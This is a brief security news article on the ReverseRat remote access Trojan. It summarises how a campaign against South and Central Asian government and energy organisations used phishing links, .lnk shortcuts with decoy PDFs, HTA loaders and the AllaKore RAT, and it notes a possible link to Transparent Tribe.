Black Lotus Labs has discovered a new ReverseRat remote access Trojan that targets government and energy organizations in South and Central Asia. Supposedly, the operating infrastructure of the cybercriminal group is located in Pakistan.
In addition to ReverseRat, criminals install an open-source RAT called AllaKore in parallel on systems to infect other systems and ensure persistence.
In the first phase of the campaign, the criminals, presumably through emails, sent victims URLs that redirected them to compromised websites. According to experts from Black Lotus Labs, the attackers decided to use the hacked domains in the same country as the attacked organization in order to avoid detection and disguise themselves among the standard web browsing activity on the network.
Clicking on the links downloaded a .zip archive containing a Microsoft file shortcut (.lnk) and a PDF file. When launching a shortcut, a PDF file was displayed, distracting the user’s attention. At the same time, the .lnk was secretly extracting and running an HTA file (HTML application) from the compromised website.
Organizations and events related to the events in India in spring 2021 were mentioned in the fake PDFs. Some of the papers or decoys had a more general theme and related to COVID-19 vaccination, while others were related to the energy sector.
Then preBotHta launched ReverseRat, which, through Windows Management Instrumentation (WMI), collected information about the MAC address, physical memory on the device, processor (maximum clock frequency, name, manufacturer), etc. The malware encrypted data using an RC4 key and sent it to C&C server.
The second HTA file contained a coded command to modify a registry key, a bootloader, and an AllaKore tool that provided access to the compromised network.
Analyzing the campaign, experts have identified similarities with the techniques, tactics and procedures used in an operation called Operation SideCopy, organized by the Pakistani APT group Transparent Tribe last year. Whether the two groups are related, the experts did not clarify.
Catch up on more articles here
Follow us on Twitter here